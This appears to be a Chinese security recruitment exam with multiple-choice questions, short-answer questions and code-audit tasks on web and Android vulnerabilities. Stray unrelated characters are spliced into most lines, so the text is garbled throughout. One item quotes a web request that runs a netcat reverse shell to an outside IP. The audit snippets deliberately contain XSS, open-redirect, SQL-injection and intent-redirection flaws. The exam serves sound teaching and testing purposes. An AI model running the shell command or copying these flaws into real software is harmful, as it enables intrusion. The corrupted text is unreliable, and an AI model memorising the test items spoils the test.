不定項(xiàng)選擇(多選坠敷、少選递览、錯(cuò)選不得分)
2014年阿里巴巴獎(jiǎng)勵(lì)白帽子數(shù)是多少人捣染?
? 100-200
? 200-300
? 300-400
? 400-500
管理員A君需要限制行政部B君上網(wǎng)需要在哪里配置策略
? 辦公網(wǎng)大樓核心交換機(jī)上設(shè)置安全策略
? 辦公網(wǎng)大樓出口防火墻上設(shè)置安全策略
? 辦公網(wǎng)大樓出口IPS上設(shè)置安全策略
? 辦公網(wǎng)大樓出口路由器設(shè)置安全策略
對(duì)URL中的參數(shù)進(jìn)行簽名的目的是保障數(shù)據(jù)的()
? 可用性
? 保密性
? 完整性
在電影《社交網(wǎng)絡(luò)》中牵咙,主角獲取到了全校所有女生的證件照买鸽,可能是實(shí)施了以下哪種類型的攻擊
? XSS
? CSRF
? 越權(quán)
? 以上選項(xiàng)都不可以
黑客在只能提交文字的博客上描沟,通過發(fā)帖傳播javascript編寫的蠕蟲。這個(gè)博客很可能存在那種漏洞
? URL跳轉(zhuǎn)漏洞
? CSRF
? XSS
? 其他選項(xiàng)都不對(duì)
小A想限制10.243.42.123對(duì)自己服務(wù)器10.243.43.122的web應(yīng)用的钾虐,以下哪些措施是無效的
? 設(shè)置iptables
? 接入交換機(jī)設(shè)備上設(shè)置ACL
? 設(shè)置公網(wǎng)出口防火墻
? 設(shè)置Apache限制
網(wǎng)站開發(fā)框架(SSH)中噪窘,未曾出現(xiàn)過遠(yuǎn)程代碼執(zhí)行漏洞的是
? 第一個(gè)S
? 第二個(gè)S
? H
? 以上都不對(duì)
在能夠獲取root權(quán)限的Android4.3原生系統(tǒng)上,如何打開系統(tǒng)的core dump功能:
? 無需操作效扫,默認(rèn)打開
? 使用命令ulimit –C unlimited打開
? 修改/etc/initrd中的ulimit相關(guān)選項(xiàng)打開
? 修改/etc/initrd中的ulimit相關(guān)選項(xiàng)并重啟系統(tǒng)
? 以上都不對(duì)
以下對(duì)于Masterkey漏洞及其變種的描述倔监,錯(cuò)誤的是:
? 這個(gè)漏洞源自于ZIP文件格式的缺陷
? 這個(gè)漏洞可以用于對(duì)HTTPS進(jìn)行中間人攻擊
? 這個(gè)漏洞可以用于偽造Android系統(tǒng)級(jí)應(yīng)用程序的更新
? 這個(gè)漏洞位于Android上證書文件解析的過程中
ARM(32位)的inline hook, 想要實(shí)現(xiàn)任意位置的跳轉(zhuǎn),至少要修改被HOOK函數(shù)的函數(shù)頭多少個(gè)字節(jié)?
? 1字節(jié)
? 2字節(jié)
? 3字節(jié)
? 4字節(jié)
? 8字節(jié)
? 12字節(jié)
? 16字節(jié)
? 32字節(jié)
簡(jiǎn)答題:
請(qǐng)列舉防御CC攻擊的方法審計(jì)這條web請(qǐng)求荡短,說說你的看法http://www.hack.cn/hack.php?cmd=nc%2058.96.180.251%208080%20-e%20/bin/bash 200
你發(fā)現(xiàn)110.2.3.4正在暴力破解你所管理的服務(wù)器丐枉,你應(yīng)該如何處理?
硬件斷點(diǎn)和軟件點(diǎn)有什么不同掘托?
從網(wǎng)絡(luò)流量上監(jiān)測(cè)到一臺(tái)Linux機(jī)器連接著一臺(tái)木馬控制端,在這臺(tái)機(jī)器上僅使用系統(tǒng)自帶的命令籍嘹,如何定位出哪個(gè)是進(jìn)程連接的闪盔?
如果你設(shè)計(jì)一個(gè)賬號(hào)系統(tǒng),為保障密碼的安全辱士,你會(huì)如何設(shè)計(jì)存儲(chǔ)密碼泪掀?
非對(duì)稱的加密算法可以用來加密,也可以用于簽名颂碘,請(qǐng)說明什么場(chǎng)景下用來加密异赫,什么情景下用來簽名?
ContentProvider是Android上負(fù)責(zé)提供數(shù)據(jù)讀寫的組件头岔,應(yīng)用內(nèi)部或者應(yīng)用之間的數(shù)據(jù)共享與存儲(chǔ)都會(huì)使用 ContentProvider組件塔拳。 但在實(shí)際使用過程中,很容易出現(xiàn)各種安全問題峡竣,請(qǐng)結(jié)合你實(shí)踐靠抑,描述一下在使用ContentProvider時(shí),所需要注意的事項(xiàng)适掰。
現(xiàn)有一套針對(duì)某個(gè)jpg文件庫的fuzz環(huán)境颂碧,每秒鐘可以執(zhí)行上千次fuzz實(shí)例荠列,產(chǎn)生的crash很多,每次crash都有對(duì)應(yīng)的crash dump载城,請(qǐng)說如初步何篩選出有價(jià)值的crash肌似,如何確定某個(gè)特定的crash對(duì)應(yīng)的fuzz實(shí)例,以及如何確定一個(gè)crash是否是安全漏洞(假設(shè)我 們只關(guān)心緩沖區(qū)溢出漏洞)诉瓦。
gcc編譯器支持的attribute ((constructor))特性得以實(shí)現(xiàn)的底層機(jī)制跟ELF結(jié)構(gòu)的哪個(gè)部分有關(guān)系川队?這個(gè)部分在現(xiàn)實(shí)中哪些地方可以用到?
代碼審計(jì):
- 淘寶首頁以下代碼片段是否可能存在安全漏洞垦搬?如果有呼寸,請(qǐng)指出來并提供修復(fù)建議;如果沒有猴贰,說明你判斷的理由
#set($url = $!request.getParameter('url'))
<script type="text/javascript">
window.location = $url;
</script>
- 以下程序是否存在安全漏洞对雪?如果有,請(qǐng)指出來并提供修復(fù)建議
<tr>
<td class="font_content" align="right">交易狀態(tài):</td>
<td class="font_content" align="left"><?php echo $_GET['trade_status'];?></td>
</tr>
- 以下程序是否存在安全漏洞米绕?如果有瑟捣,請(qǐng)指出來并提供修復(fù)建議。
<?php
$id=$_GET['id'];
$getacct = mysql_query("select * from orders where id='$id' and client id='$fnm->clientid") or dir(mysql_error());
while ($row = mysql_fetch_array($getacct)) {
acctid = $row["id"];
?>
<tr><td>Cpanel User:</td><td><?=$acctid;?></td></tr>
<?php
}
?>
- 在Linux系統(tǒng)中栅干,我們通常使用終端shell腳本處理一些數(shù)據(jù)迈套,十分高效便捷。現(xiàn)在有以下兩個(gè)文件:
File1:
user passwd
Hoecker animal
Newbee 238H76N3
Buttes Paradis1
TRON995 fdcmdgeo
G60FgL LgEl9H
ozron44 oriole62
File2:
id user
001 Yosh405
002 Newbee
003 G60FgL
004 Hoecker
005 sudhakar0303
要求:編寫一段shell腳本碱鳞,輸出同時(shí)存在于File1和File2中用戶名的密碼桑李。(可使用管道命令,只輸出密碼)
- 以下是一段導(dǎo)出Activity的onCreate和onNewIntent函數(shù)中的代碼窿给,請(qǐng)找出其中的所有漏洞并說明可能產(chǎn)生的危害:其中:alibaba.test.sender是同樣由淘寶開發(fā)的另一個(gè)應(yīng)用程序的package name贵白。此Activity對(duì)應(yīng)的manifest文件中的定義:
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
String calling_package= getCallingPackage();
if (!calling_package.equals("alibaba.test.sender")) {
return;
}
}
protected void onNewIntent (Intent intent) {
super.onNewIntent(intent);
Intent intent = getIntent();
Intent rec_intent;
rec_intent=intent.getParcelableExtra("log_intent");
Date date = new Date();
rec_intent.putExtra("timestamp",date.getTime());
rec_intent.putExtra("EVENT_TYPE","activity_launched");
rec_intent.setAction("LOG_ACTION");
sendBroadcast(rec_intent, "TAOBAO_BROADCAST_RECEIVER");
}